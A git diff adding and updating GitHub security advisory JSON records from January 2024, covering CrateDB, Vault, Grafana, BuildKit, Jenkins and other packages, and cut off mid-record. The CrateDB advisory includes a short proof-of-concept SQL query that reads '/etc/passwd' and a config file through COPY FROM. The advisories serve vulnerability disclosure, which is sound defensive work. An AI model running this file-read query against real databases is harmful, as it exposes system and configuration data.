0000000000000..f13c8e9ae5015 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-45gq-q4xh-cp53/GHSA-45gq-q4xh-cp53.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-45gq-q4xh-cp53", + "modified": "2024-01-30T20:56:48Z", + "published": "2024-01-30T20:56:48Z", + "aliases": [ + "CVE-2024-21671" + ], + "summary": "vantage6 vulnerable to username timing attack", + "details": "### Impact\nIt is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks\n\n### Workarounds\nNo\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6-server" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21671" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/389f416c445da4f2438c72f34c3b1084485c4e30" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:48Z", + "nvd_published_at": "2024-01-30T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json b/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json new file mode 100644 index 0000000000000..2a52003bcab7c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-475g-vj6c-xf96/GHSA-475g-vj6c-xf96.json @@ -0,0 +1,141 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-475g-vj6c-xf96", + "modified": "2024-01-30T20:57:16Z", + "published": "2024-01-30T20:57:16Z", + "aliases": [ + "CVE-2024-24565" + ], + "summary": "CrateDB database has an arbitrary file read vulnerability", + "details": "### Summary\nThere is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.\n\n### Details\nThere is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.\n\n### PoC\n```\nCREATE TABLE info_leak(info_leak STRING);\nCOPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);\nSELECT * FROM info_leak;\n```\n![image](https://user-images.githubusercontent.com/154296962/292985975-ff5f2fb8-1a3f-4b49-9951-cd1fc6e78031.png)\n\n\n### Impact\nThis vulnerability affects all current versions of the CrateDB database. Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.\n![image](https://user-images.githubusercontent.com/154296962/292986215-aec5adfe-38cc-4f31-bf86-c50ecbb44d5d.png)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.3.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.0" + }, + { + "fixed": "5.4.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "fixed": "5.5.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.6.0" + }, + { + "fixed": "5.6.1" + } + ] + } + ], + "versions": [ + "5.6.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24565" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/32d0fc2ebb834ea324eb7ab5d01320a67bc5c3c7" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/4e857d675683095945dd524d6ba03e692c70ecd6" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/b75aeeabf90f51bd96ddb499903928fd10185207" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/c4c97d5a1c52cc2250ea42d062a3d37550c19dd5" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/c5034323f1b56ca5d04b8ef4c6029eb63a5ba172" + }, + { + "type": "PACKAGE", + "url": "https://github.com/crate/crate" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:16Z", + "nvd_published_at": "2024-01-30T17:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json b/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json new file mode 100644 index 0000000000000..6dc688b580a28 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4957-7vhp-7v59/GHSA-4957-7vhp-7v59.json @@ -0,0 +1,78 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4957-7vhp-7v59", + "modified": "2024-02-02T20:31:47Z", + "published": "2024-01-26T18:30:34Z", + "aliases": [ + "CVE-2024-0937" + ], + "summary": "Deserialization of untrusted data in synthcity", + "details": "A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "synthcity" + }, + "ecosystem_specific": { + "affected_functions": [ + "synthcity.utils.serialization.load_from_file" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0937" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-6" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vanderschaarlab/synthcity" + }, + { + "type": "WEB", + "url": "https://github.com/vanderschaarlab/synthcity/blob/73cfd8ca784f70141fc7f2969221cd3b5737f7b1/src/synthcity/utils/serialization.py#L30" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252182" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252182" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:31:47Z", + "nvd_published_at": "2024-01-26T18:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json b/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json new file mode 100644 index 0000000000000..7dfed4fcffd76 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-496g-fr33-whrf/GHSA-496g-fr33-whrf.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-496g-fr33-whrf", + "modified": "2024-01-31T23:11:24Z", + "published": "2024-01-31T23:11:24Z", + "aliases": [ + "CVE-2020-25201" + ], + "summary": "Denial of service in HashiCorp Consul", + "details": "HashiCorp Consul Enterprise versions 1.7.0 up to 1.7.8 and 1.8.0 up to 1.8.4 includes a namespace replication bug which can be triggered to cause denial of service via infinite Raft writes. Fixed in 1.7.9 and 1.8.5.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.7.0" + }, + { + "fixed": "1.7.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25201" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/pull/9024" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/blob/master/CHANGELOG.md#185-october-23-2020" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/releases/tag/v1.8.5" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202208-09" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/consul" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-834" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:24Z", + "nvd_published_at": "2020-11-04T23:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json b/advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json similarity index 75% rename from advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json rename to advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json index db041990a1443..772426a709503 100644 --- a/advisories/unreviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json +++ b/advisories/github-reviewed/2024/01/GHSA-4hrp-m3f2-643j/GHSA-4hrp-m3f2-643j.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-4hrp-m3f2-643j", - "modified": "2024-01-26T21:30:21Z", + "modified": "2024-01-29T22:30:31Z", "published": "2024-01-19T21:30:36Z", "aliases": [ "CVE-2024-23679" ], + "summary": "Session fixation in Enonic XP", "details": "Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.\n\n", "severity": [ { @@ -14,7 +15,25 @@ } ], "affected": [ - + { + "package": { + "ecosystem": "Maven", + "name": "com.enonic.xp:lib-auth" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "7.7.4" + } + ] + } + ] + } ], "references": [ { @@ -55,8 +74,8 @@ "CWE-384" ], "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:31Z", "nvd_published_at": "2024-01-19T21:15:10Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json b/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json new file mode 100644 index 0000000000000..91ed7b53d6b87 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4jwq-572w-4388/GHSA-4jwq-572w-4388.json @@ -0,0 +1,307 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jwq-572w-4388", + "modified": "2024-01-30T23:55:38Z", + "published": "2024-01-30T23:55:38Z", + "aliases": [ + "CVE-2021-29511" + ], + "summary": "Memory over-allocation in evm crate", + "details": "### Impact\nPrior to the patch, when executing specific EVM opcodes related to memory operations that use `evm_core::Memory::copy_large`, the crate can over-allocate memory when it is not needed, making it possible for an attacker to perform denial-of-service attack.\n\n### Patches\nThe flaw was corrected in commit `19ade85`. Users should upgrade to `==0.21.1, ==0.23.1, ==0.24.1, ==0.25.1, >=0.26.1`.\n\n### Workarounds\nNone. Please upgrade your `evm` crate version\n\n### References\nFix commit: https://github.com/rust-blockchain/evm/commit/19ade858c430ab13eb562764a870ac9f8506f8dd\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [evm repo](https://github.com/rust-blockchain/evm)\n* Email [Wei](mailto:wei@that.world)\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.21.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.21.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.21.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.21.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.22.0" + }, + { + "fixed": "0.22.1" + } + ] + } + ], + "versions": [ + "0.22.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.0" + }, + { + "fixed": "0.23.1" + } + ] + } + ], + "versions": [ + "0.23.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.24.0" + }, + { + "fixed": "0.24.1" + } + ] + } + ], + "versions": [ + "0.24.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.25.0" + }, + { + "fixed": "0.25.1" + } + ] + } + ], + "versions": [ + "0.25.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.26.0" + }, + { + "fixed": "0.26.1" + } + ] + } + ], + "versions": [ + "0.26.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.22.0" + }, + { + "fixed": "0.22.1" + } + ] + } + ], + "versions": [ + "0.22.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.23.0" + }, + { + "fixed": "0.23.1" + } + ] + } + ], + "versions": [ + "0.23.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.24.0" + }, + { + "fixed": "0.24.1" + } + ] + } + ], + "versions": [ + "0.24.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.25.0" + }, + { + "fixed": "0.25.1" + } + ] + } + ], + "versions": [ + "0.25.0" + ] + }, + { + "package": { + "ecosystem": "crates.io", + "name": "evm-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.26.0" + }, + { + "fixed": "0.26.1" + } + ] + } + ], + "versions": [ + "0.26.0" + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rust-blockchain/evm/security/advisories/GHSA-4jwq-572w-4388" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29511" + }, + { + "type": "WEB", + "url": "https://github.com/rust-blockchain/evm/commit/19ade858c430ab13eb562764a870ac9f8506f8dd" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770", + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:55:38Z", + "nvd_published_at": "2021-05-12T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json b/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json index b839616da29b6..0631a27f212b1 100644 --- a/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json +++ b/advisories/github-reviewed/2024/01/GHSA-4m77-cmpx-vjc4/GHSA-4m77-cmpx-vjc4.json @@ -80,6 +80,10 @@ { "type": "PACKAGE", "url": "https://github.com/jupyterlab/jupyterlab" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json b/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json new file mode 100644 index 0000000000000..6a3eb6080ccea --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4mp7-2m29-gqxf/GHSA-4mp7-2m29-gqxf.json @@ -0,0 +1,122 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mp7-2m29-gqxf", + "modified": "2024-01-31T00:21:58Z", + "published": "2024-01-31T00:21:58Z", + "aliases": [ + "CVE-2020-16251" + ], + "summary": "HashiCorp Vault Authentication bypass", + "details": "HashiCorp Vault and Vault Enterprise versions 0.8.3 and newer, when configured with the GCP GCE auth method, may be vulnerable to authentication bypass. Fixed in 1.2.5, 1.3.8, 1.4.4, and 1.5.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.3" + }, + { + "fixed": "1.2.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.0" + }, + { + "fixed": "1.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-16251" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#151" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/vault/" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/159479/Hashicorp-Vault-GCP-IAM-Integration-Authentication-Bypass.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:58Z", + "nvd_published_at": "2020-08-26T15:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json b/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json new file mode 100644 index 0000000000000..59afafb3e1557 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4pwp-cx67-5cpx/GHSA-4pwp-cx67-5cpx.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4pwp-cx67-5cpx", + "modified": "2024-01-31T23:11:17Z", + "published": "2024-01-31T23:11:17Z", + "aliases": [ + "CVE-2019-19499" + ], + "summary": "Grafana Arbitrary File Read", + "details": "Grafana <= 6.4.3 has an Arbitrary File Read vulnerability, which could be exploited by an authenticated attacker that has privileges to modify the data source configurations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:P" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana/pkg/tsdb/mysql" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.4.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-19499" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/20192" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#644-2019-11-06" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200918-0003/" + }, + { + "type": "WEB", + "url": "https://swarm.ptsecurity.com/grafana-6-4-3-arbitrary-file-read/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-22", + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:17Z", + "nvd_published_at": "2020-08-28T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json b/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json index 721ca7ee68de0..e7670bc4c520e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json +++ b/advisories/github-reviewed/2024/01/GHSA-4qhp-652w-c22x/GHSA-4qhp-652w-c22x.json @@ -62,6 +62,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-22", "CWE-23" ], "severity": "HIGH", diff --git a/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json b/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json new file mode 100644 index 0000000000000..53c15155248d2 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-4v98-7qmw-rqr8/GHSA-4v98-7qmw-rqr8.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v98-7qmw-rqr8", + "modified": "2024-02-01T17:48:26Z", + "published": "2024-01-31T22:43:26Z", + "aliases": [ + "CVE-2024-23652" + ], + "summary": "BuildKit vulnerable to possible host system access from mount stub cleaner", + "details": "### Impact\nA malicious BuildKit frontend or Dockerfile using `RUN --mount` could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing `RUN --mount` feature.\n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23652" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4603" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:26Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json b/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json index 2fe07615d8ba6..22e5cbae0d5da 100644 --- a/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json +++ b/advisories/github-reviewed/2024/01/GHSA-53ph-2r2x-vqw8/GHSA-53ph-2r2x-vqw8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-53ph-2r2x-vqw8", - "modified": "2024-01-26T01:57:04Z", + "modified": "2024-01-31T20:22:29Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23898" @@ -9,7 +9,10 @@ "summary": "Cross-site WebSocket hijacking vulnerability in the Jenkins CLI", "details": "\n\nJenkins has a built-in command line interface (CLI) to access Jenkins from a script or shell environment. Since Jenkins 2.217 and LTS 2.222.1, one of the ways to communicate with the CLI is through a WebSocket endpoint. This endpoint relies on the default Jenkins web request authentication functionality, like HTTP Basic authentication with API tokens, or session cookies. This endpoint is enabled when running on a version of Jetty for which Jenkins supports WebSockets. This is the case when using the provided native installers, packages, or the Docker containers, as well as when running Jenkins with the command java -jar jenkins.war.\n\nJenkins 2.217 through 2.441 (both inclusive), LTS 2.222.1 through 2.426.2 (both inclusive) does not perform origin validation of requests made through the CLI WebSocket endpoint, resulting in a cross-site WebSocket hijacking (CSWSH) vulnerability.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -22,13 +25,47 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.222.1" + "introduced": "2.217" + }, + { + "fixed": "2.426.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.426.2" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.427" }, { - "fixed": "2.427" + "fixed": "2.442" } ] } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.440" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "versions": [ + "2.441" ] } ], @@ -48,7 +85,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "HIGH", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json b/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json new file mode 100644 index 0000000000000..95627220b57e5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-5626-pw9c-hmjr/GHSA-5626-pw9c-hmjr.json @@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5626-pw9c-hmjr", + "modified": "2024-02-08T16:30:05Z", + "published": "2024-01-31T18:04:48Z", + "aliases": [ + "CVE-2024-23637" + ], + "summary": "OctoPrint Unverified Password Change via Access Control Settings", + "details": "### Impact\n\nOctoPrint versions up until and including 1.9.3 contain a vulnerability that allows malicious admins to change the password of other admin accounts, including their own, without having to repeat their password.\n\nAn attacker who managed to hijack an admin account might use this to lock out actual admins from their OctoPrint instance.\n\n### Patches\n\nThe vulnerability will be patched in version 1.10.0.\n\n### Workarounds\n\nOctoPrint administrators are strongly advised to thoroughly vet who has admin access to their installation.\n\n### Credits\n\nThis vulnerability was discovered and responsibly disclosed to OctoPrint by Timothy \"TK\" Ruppert.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "OctoPrint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.10.0rc1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.9.3" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-5626-pw9c-hmjr" + }, + 